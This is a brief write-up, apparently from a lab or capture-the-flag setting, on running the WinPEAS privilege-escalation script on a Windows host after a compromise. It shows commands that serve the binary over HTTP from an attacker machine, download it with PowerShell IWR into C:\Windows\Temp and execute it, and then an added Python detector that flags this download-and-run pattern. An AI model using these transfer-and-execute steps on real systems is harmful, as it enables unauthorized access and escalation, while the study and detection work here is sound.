WinPEAS is a script that searches for possible paths to escalate privileges on Windows hosts. This write-up covers how to run it and complete post-exploitation activities.
How to
1. Download the script from GitHub (https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite)
- git clone https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite.git
- cd privilege-escalation-awesome-scripts-suite
2. Navigate through the directories to find the binary files
- cd winPEAS/winPEASexe/binaries/
- ls
3. Depending on the type of machine, you need to use x64 or x86. This demo runs on an x64 machine, so I choose that one
- cd x64/Release
- ls
4. There we have our executable, winPEASx64.exe. We now need to find a way to move it to our target machine and execute it
5. We will start a web server at the binary location
- python3 -m http.server 9999
6. From the remote server I will use PowerShell (IWR); you can also use cmd (certutil)
- cd C:\Windows\Temp
- IWR http://10.10.14.10:9999/winPEASx64.exe -OutFile winPEASx64.exe
- dir
7. Now that it is on the server, execute it
- .\winPEASx64.exe
8. Now you can start inspecting the data
Extra
1. Sometimes it is better to try the .bat file if the .exe is failing
- powershell.exe IWR http://192.168.0.12:9999/winPEAS.bat -OutFile winPEAS.bat
- dir
2. Run the app
- .\winPEAS.bat
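
Detection note: the transfer-and-run sequence above (an IWR or certutil download over HTTP, then execution from C:\Windows\Temp) leaves a recognisable trail in process-creation logs. The following is an added example, not part of the original write-up or of the WinPEAS project; the event field names (host, image, cmdline) and the sample events are assumptions constructed for illustration.

```python
import re

# Download of a script/binary over HTTP with the tools the post names (IWR, certutil).
DOWNLOAD = re.compile(
    r"(?i)\b(?:iwr|invoke-webrequest|certutil(?:\.exe)?)\b.*?"
    r"https?://\S+/(?P<file>[\w.-]+\.(?:exe|bat))\b")
# Process image started directly from the world-writable Windows temp directory.
TEMP_EXEC = re.compile(r"(?i)^c:\\windows\\temp\\(?P<file>[\w.-]+\.(?:exe|bat))$")

def detect(events):
    """Return (severity, host, file, reason) tuples for a time-ordered event list."""
    alerts, downloaded = [], set()
    for ev in events:
        host = ev["host"]
        m = DOWNLOAD.search(ev["cmdline"])
        if m:
            name = m["file"].lower()
            downloaded.add((host, name))
            alerts.append(("medium", host, name, "HTTP download of executable content"))
        m = TEMP_EXEC.match(ev["image"])
        if m:
            name = m["file"].lower()
            # Same file fetched earlier on this host and now run: escalate.
            if (host, name) in downloaded:
                alerts.append(("high", host, name, "downloaded file executed from Temp"))
            else:
                alerts.append(("low", host, name, "execution from C:\\Windows\\Temp"))
    return alerts

# Constructed sample events (not real logs), modelled on the commands in this post.
SAMPLE = [
    {"host": "WS01",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe IWR http://10.10.14.10:9999/winPEASx64.exe "
                "-OutFile winPEASx64.exe"},
    {"host": "WS01", "image": r"C:\Windows\Temp\winPEASx64.exe",
     "cmdline": r".\winPEASx64.exe"},
    {"host": "WS02", "image": r"C:\Windows\System32\cmd.exe", "cmdline": "cmd.exe /c dir"},
    {"host": "WS02", "image": r"C:\Windows\Temp\setup.exe", "cmdline": "setup.exe /quiet"},
]

if __name__ == "__main__":
    for alert in detect(SAMPLE):
        print(alert)
```

The correlation step is what keeps the noise down: execution from Temp alone is rated low because installers do it routinely, while a download followed by execution of the same file name on the same host is rated high.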